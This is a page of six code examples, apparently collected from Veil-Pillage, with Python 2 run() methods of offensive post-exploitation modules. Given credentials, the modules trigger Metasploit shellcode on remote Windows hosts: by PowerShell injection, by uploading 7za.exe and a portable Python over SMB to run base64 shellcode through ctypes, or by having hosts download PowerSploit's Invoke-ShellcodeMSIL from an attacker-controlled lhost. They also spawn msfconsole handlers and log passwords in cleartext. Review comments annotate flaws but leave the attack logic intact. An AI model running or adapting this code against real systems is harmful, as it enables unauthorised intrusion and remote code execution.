コード例 #1
    def run(self):
        """Build a PowerShell payload command and trigger it on each target.

        Uses the first credential pair in self.creds and the "trigger_method"
        and "spawn_handler" entries of self.required_options. The payload comes
        from virtual.Payload(), optionally configured from
        self.args.msfpayload / self.args.msfoptions or self.args.custshell.

        Side effects visible in this method: optionally opens a gnome-terminal
        tab running msfconsole and then waits on raw_input, calls
        command_methods.executeCommand once per target, and appends to
        self.output and self.cleanup. Both of those strings embed the username
        and password in cleartext, so anything they are written to is as
        sensitive as the credentials themselves.

        Python 2 only (print statement, raw_input).
        """

        # assume single set of credentials
        # (only creds[0] is used; an empty self.creds fails on this line)
        username, password = self.creds[0]

        # option values are read as element [0] of their entry
        # presumably each entry is [value, description] -- verify against the module's __init__
        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # create our powershell payload
        p = virtual.Payload()

        # pull out any msfpayload payloads/options
        if self.args.msfpayload:
            p.shellcode.SetPayload(
                [self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        # (if neither argument is set, p.shellcode is left as constructed)
        elif self.args.custshell:
            p.shellcode.setCustomShellcode(self.args.custshell)

        # get the powershell command
        powershellCommand = p.generate()

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
                         "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        # (the option is compared as a string, case-insensitively, against "true")
        if spawnHandler.lower() == "true":
            # turn the payload shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(p.shellcode)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                # NOTE(review): cmd is assembled by string concatenation and
                # handed to the shell via os.system; handlerPath is wrapped in
                # single quotes but not escaped, so a path containing a quote
                # or shell metacharacter would change the command. Confirm
                # shellcodeToHandler only returns tool-generated paths.
                os.system(cmd)
                # os.system's exit status is ignored; the operator confirms readiness by hand
                raw_input("\n\n [>] Press enter when handler is ready: ")

        for target in self.targets:

            print helpers.color(" [*] Triggering powershell command on " +
                                target)

            # execute the powershell command on each host
            # (the return value is not checked, so the log line below says
            # "triggered" whether or not execution succeeded)
            command_methods.executeCommand(target, username, password,
                                           powershellCommand, triggerMethod)

            # NOTE(review): the log line records username:password in cleartext
            self.output += "[*] Powershell inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

            # build our cleanup file -> kill all powershell processes
            # (taskkill /f /im matches by image name, so this ends every
            # powershell.exe on the host, not only the one started above)
            killCMD = "taskkill /f /im powershell.exe"
            # pipe-delimited cleanup record: action|target|username|password|command|trigger
            # the password is stored in cleartext; presumably parsed by splitting on "|" -- verify
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
コード例 #2
    def run(self):
        """Generate a PowerShell payload command and run it on every target.

        Inputs read from the instance: self.creds[0] (username, password),
        self.required_options["trigger_method"] and ["spawn_handler"],
        self.args.msfpayload / msfoptions / custshell, and self.targets.

        Effects: may spawn msfconsole in a new gnome-terminal tab and pause on
        raw_input; calls command_methods.executeCommand per target; appends a
        log line to self.output and a cleanup record to self.cleanup per
        target. The log line and the cleanup record both contain the password
        in cleartext.

        Written for Python 2 (print statement, raw_input).
        """

        # assume single set of credentials
        # (no guard for an empty self.creds; extra entries are ignored)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # create our powershell payload
        p = virtual.Payload()

        # pull out any msfpayload payloads/options
        if self.args.msfpayload:
            p.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            p.shellcode.setCustomShellcode(self.args.custshell)

        # get the powershell command
        powershellCommand = p.generate()

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn the payload shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(p.shellcode)
            # make sure a handler was returned (empty string means none)
            if handlerPath != "":
                # command to spawn a new tab
                # NOTE(review): handlerPath is concatenated into a shell string
                # without escaping; a quote or metacharacter in the path would
                # alter what the shell runs. Verify the helper only returns
                # tool-controlled paths.
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                # wait for the operator; os.system's status is not inspected
                raw_input("\n\n [>] Press enter when handler is ready: ")


        for target in self.targets:

            print helpers.color(" [*] Triggering powershell command on "+target)

            # execute the powershell command on each host
            # (result is not checked before logging success below)
            command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod)

            # NOTE(review): cleartext credentials end up in the module output
            self.output += "[*] Powershell inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

            # build our cleanup file -> kill all powershell processes
            # (matches by image name: every powershell.exe on the host is terminated)
            killCMD = "taskkill /f /im powershell.exe"
            # record format: executeCommand|target|username|password|command|trigger
            # the password is written in cleartext; a "|" inside any field
            # would presumably break parsing -- verify against the cleanup reader
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
コード例 #3
    def run(self):
        """Upload a zipped Python environment to each target and run shellcode with it.

        Uses self.creds[0], the "trigger_method" and "spawn_handler" options,
        and the optional msfpayload/custshell arguments. Shellcode from
        shellcode.Shellcode() is base64-encoded and embedded in a
        "python.exe -c" one-liner. For every target the method uploads 7za.exe
        and python.zip with smb.uploadFiles, then issues the unzip command and
        the python command through command_methods.executeCommand.

        Appends progress lines to self.output and cleanup records to
        self.cleanup; cleanup records are only written when the upload
        reported "success". Both strings contain the username and password in
        cleartext.

        Python 2 only (print statement, raw_input, "string_escape" codec).
        """

        handlerPath = "none"

        # assume single set of credentials
        # (an empty self.creds fails here; extra entries are ignored)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # nab up some shellcode from Veil-Evasion
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # base64 our shellcode
        # str.decode("string_escape") is a Python 2-only codec that turns escape
        # sequences in the text into the bytes they denote
        # (assumes sc.generate() returns "\x.."-escaped text -- TODO confirm)
        b64sc = base64.b64encode(sc.generate().decode("string_escape"))

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
                         "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                # NOTE(review): shell string built by concatenation; handlerPath
                # is quoted but not escaped. Confirm it is always tool-generated.
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # otherwise, if we have a custom handler path, try to invoke that
        # NOTE(review): handlerPath is still the initial "none" whenever this
        # elif is evaluated (it is only reassigned inside the branch above), so
        # the body below cannot run as written. It also tests os.path.isdir()
        # on a value that is passed to msfconsole -r as a script path; isfile
        # looks like what was meant -- confirm.
        elif handlerPath.lower() != "none":
            if os.path.isdir(handlerPath):
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n [>] Press enter when handler is ready: ")
            else:
                print helpers.color(" [!] Warning: handlerPath '" +
                                    handlerPath + "' not valid!")
        else:
            pass

        # Target-side artifacts of this module, as written below: 7za.exe and
        # python.zip under C:\Windows\Temp (uploaded over the C$ share), the
        # extracted python directory there, and a "python.exe -c" command line
        # that imports ctypes.

        # command to unzip the uploaded python installation
        # (the literal yields doubled backslashes in the final string;
        # presumably a later layer un-escapes once -- verify)
        unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
        # path to the 7zip binary
        zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"

        # command to invoke shellcode using python
        # (b64sc is substituted for %s inside the quoted one-liner)
        pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (
            b64sc)
        # path to the minimal python install
        pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"

        for target in self.targets:

            # upload the 7zip.exe binary and the python install
            uploadResult = smb.uploadFiles(target, username, password, "C$",
                                           "\\Windows\\Temp\\",
                                           [zipPath, pythonPath])

            # the upload helper is expected to return the string "success";
            # anything else is treated as failure
            if uploadResult == "success":
                # NOTE(review): every log line below records username:password in cleartext
                self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"

                print helpers.color(" [*] Triggering 7zip unzip command on " +
                                    target)
                # executeCommand results are not checked; the log lines say
                # "triggered" regardless of outcome
                command_methods.executeCommand(target, username, password,
                                               unzipCommand, triggerMethod)
                self.output += "[*] 7za unzip command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

                print helpers.color(" [*] Triggering 'python -c' command on " +
                                    target)
                command_methods.executeCommand(target, username, password,
                                               pythonCMD, triggerMethod)
                self.output += "[*] 'python -c' inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

                # build our cleanup file -> kill all python processes and delete the environments
                # (taskkill /f /im matches by image name: every python.exe on
                # the host is terminated, not only the one started above)
                killCMD = "taskkill /f /im python.exe"
                # cleanup record: executeCommand|target|username|password|command|trigger
                # (password stored in cleartext)
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
                # command to delete the python extracted directory, zipped python environment and 7za.exe binary
                delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delCMD + "|" + triggerMethod + "\n"

            else:
                # failed upload: nothing is executed and no cleanup record is added
                self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"
                print helpers.color(
                    "[!] 7za.exe and python.zip unsuccessfully uploaded to " +
                    target + "\n",
                    warning=True)
コード例 #4
    def run(self):
        """Trigger PowerSploit's Invoke-ShellcodeMSIL on all targets.

        Reads self.creds[0] and the "trigger_method", "spawn_handler",
        "use_ssl" and "lhost" options. Shellcode from shellcode.Shellcode() is
        reformatted into a comma-separated list and passed as the -Shellcode
        argument of Invoke-ShellcodeMSIL; delivery to the hosts is delegated
        to delivery_methods.powershellHostTrigger.

        Appends one log line to self.output and one cleanup record to
        self.cleanup per target. Both contain the username and password in
        cleartext.

        Python 2 only (raw_input).
        """

        # assume single set of credentials
        # (an empty self.creds fails here; extra entries are ignored)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]
        # NOTE(review): use_ssl is passed through unconverted; spawn_handler is
        # compared against the string "true", so options look like strings and
        # powershellHostTrigger must do its own parsing -- verify
        use_ssl = self.required_options["use_ssl"][0]
        lhost = self.required_options["lhost"][0]

        # nab up some shellcode from Veil-Evasion
        # users can set custom shellcode there
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # generate our shellcode and get it into the correct format
        # split on backslashes, re-join with ",0" and drop the leading comma:
        # e.g. a "\x41\x42" style string becomes "0x41,0x42"
        # (assumes sc.generate() returns "\x.."-escaped text -- TODO confirm)
        sc_raw = sc.generate()
        sc_transformed = ",0".join(sc_raw.split("\\"))[1:]

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
                         "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                # NOTE(review): shell string built by concatenation; handlerPath
                # is single-quoted but not escaped. Confirm it is always a
                # tool-generated path.
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script
        secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"

        # command to invoke the appropriate shellcode in the script
        scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (
            sc_transformed)

        # trigger the powershell download on all targets
        # (one call for the whole target list; its return value is not checked)
        delivery_methods.powershellHostTrigger(self.targets,
                                               username,
                                               password,
                                               secondStagePath,
                                               lhost,
                                               scriptArguments,
                                               triggerMethod,
                                               ssl=use_ssl)

        for target in self.targets:
            # logged for every target regardless of the trigger's outcome
            # NOTE(review): records username:password in cleartext
            self.output += "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n"

            # build our cleanup file -> kill all powershell processes
            # (matches by image name: every powershell.exe on the host is terminated)
            killCMD = "taskkill /f /im powershell.exe"
            # cleanup record: executeCommand|target|username|password|command|trigger
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
コード例 #5
    def run(self):
        """Upload 7za.exe and python.zip to each target, unpack, and run shellcode via python.exe.

        Inputs: self.creds[0], the "trigger_method" and "spawn_handler"
        options, self.args.msfpayload / msfoptions / custshell, self.targets.
        The shellcode is base64-encoded and substituted into a
        "python.exe -c" command line.

        Per target: smb.uploadFiles to the C$ share, then two
        command_methods.executeCommand calls (unzip, python). Output lines go
        to self.output; cleanup records go to self.cleanup only after a
        successful upload. Every line written to either string includes the
        password in cleartext.

        Python 2 only (print statement, raw_input, "string_escape" codec).
        """

        handlerPath = "none"

        # assume single set of credentials
        # (no guard for an empty self.creds)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # nab up some shellcode from Veil-Evasion
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # base64 our shellcode
        # ("string_escape" is a Python 2-only codec: escape sequences in the
        # generated text are converted to raw bytes before encoding;
        # assumes sc.generate() returns "\x.."-escaped text -- TODO confirm)
        b64sc = base64.b64encode(sc.generate().decode("string_escape"))


        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                # NOTE(review): handlerPath goes into the shell string unescaped;
                # verify it can only be a tool-generated path
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # otherwise, if we have a custom handler path, try to invoke that
        # NOTE(review): unreachable as written -- handlerPath is only changed
        # from "none" inside the branch above, so this condition is always
        # false when evaluated. The isdir() check also looks wrong for a value
        # passed to msfconsole -r as a script file -- confirm intent.
        elif handlerPath.lower() != "none":
            if os.path.isdir(handlerPath):
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n [>] Press enter when handler is ready: ")
            else:
                print helpers.color(" [!] Warning: handlerPath '"+handlerPath+"' not valid!")
        else: pass


        # Files and processes this module leaves on a target, per the strings
        # below: C:\Windows\Temp\7za.exe, C:\Windows\Temp\python.zip, the
        # extracted C:\Windows\Temp\python directory, and a python.exe process
        # started with a -c one-liner that imports ctypes.

        # command to unzip the uploaded python installation
        unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
        # path to the 7zip binary
        zipPath = settings.VEIL_PILLAGE_PATH+"/data/environments/7za.exe"

        # command to invoke shellcode using python
        # (b64sc replaces %s inside the quoted one-liner)
        pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" %(b64sc)
        # path to the minimal python install
        pythonPath =  settings.VEIL_PILLAGE_PATH+"/data/environments/python.zip"


        for target in self.targets:

            # upload the 7zip.exe binary and the python install
            uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath])

            # only the exact string "success" counts as a successful upload
            if uploadResult == "success":
                # NOTE(review): cleartext username:password is written to the output log
                self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"

                print helpers.color(" [*] Triggering 7zip unzip command on " + target)
                # return values of executeCommand are ignored; the python
                # command is issued even if the unzip step failed
                command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod)
                self.output += "[*] 7za unzip command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

                print helpers.color(" [*] Triggering 'python -c' command on " + target)
                command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod)
                self.output += "[*] 'python -c' inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

                # build our cleanup file -> kill all python processes and delete the environments
                # (image-name match: every python.exe on the host is terminated)
                killCMD = "taskkill /f /im python.exe"
                # cleanup record: executeCommand|target|username|password|command|trigger
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
                # command to delete the python extracted directory, zipped python environment and 7za.exe binary
                delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+delCMD+"|"+triggerMethod+"\n"

            else:
                # upload failed: log it, skip execution, add no cleanup record
                self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"
                print helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to "+target+"\n", warning=True)
コード例 #6
    def run(self):
        """Deliver PowerSploit's Invoke-ShellcodeMSIL with generated shellcode to all targets.

        Reads self.creds[0], the "trigger_method", "spawn_handler", "use_ssl"
        and "lhost" options, and the optional msfpayload/custshell arguments.
        The shellcode text is converted to a comma-separated list and placed
        in the -Shellcode argument; delivery_methods.powershellHostTrigger is
        called once with the full target list.

        Appends a log line to self.output and a cleanup record to
        self.cleanup for each target; both embed the password in cleartext.

        Python 2 only (raw_input).
        """

        # assume single set of credentials
        # (no guard for an empty self.creds; extra entries are ignored)
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]
        # NOTE(review): passed to powershellHostTrigger as-is; if option values
        # are strings (spawn_handler is compared to "true"), a value such as
        # "false" is still truthy unless the callee parses it -- verify
        use_ssl = self.required_options["use_ssl"][0]
        lhost = self.required_options["lhost"][0]

        # nab up some shellcode from Veil-Evasion
        # users can set custom shellcode there
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # generate our shellcode and get it into the correct format
        # split("\\") breaks the text at each backslash, ",0".join() puts ",0"
        # between the pieces and [1:] drops the leading comma, so a
        # "\x41\x42" style string becomes "0x41,0x42"
        # (assumes sc.generate() returns "\x.."-escaped text -- TODO confirm)
        sc_raw = sc.generate()
        sc_transformed = ",0".join(sc_raw.split("\\"))[1:]

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                # NOTE(review): handlerPath is concatenated into the shell
                # string inside single quotes with no escaping; verify the
                # helper only returns tool-generated paths
                cmd = (
                    "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '"
                    + handlerPath
                    + "'\""
                )
                # invoke msfconsole with the handler script in a new tab
                # (exit status is ignored; the operator confirms by hand below)
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script
        secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"

        # command to invoke the appropriate shellcode in the script
        scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (sc_transformed)

        # trigger the powershell download on all targets
        # (return value is not checked)
        delivery_methods.powershellHostTrigger(
            self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod, ssl=use_ssl
        )

        for target in self.targets:
            # written for every target whether or not the trigger succeeded
            # NOTE(review): records username:password in cleartext
            self.output += (
                "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '"
                + username
                + ":"
                + password
                + "' on "
                + target
                + " using "
                + triggerMethod
                + "\n"
            )

            # build our cleanup file -> kill all powershell processes
            # (image-name match: every powershell.exe on the host is terminated)
            killCMD = "taskkill /f /im powershell.exe"
            # cleanup record: executeCommand|target|username|password|command|trigger
            # (password stored in cleartext)
            self.cleanup += (
                "executeCommand|"
                + target
                + "|"
                + username
                + "|"
                + password
                + "|"
                + killCMD
                + "|"
                + triggerMethod
                + "\n"
            )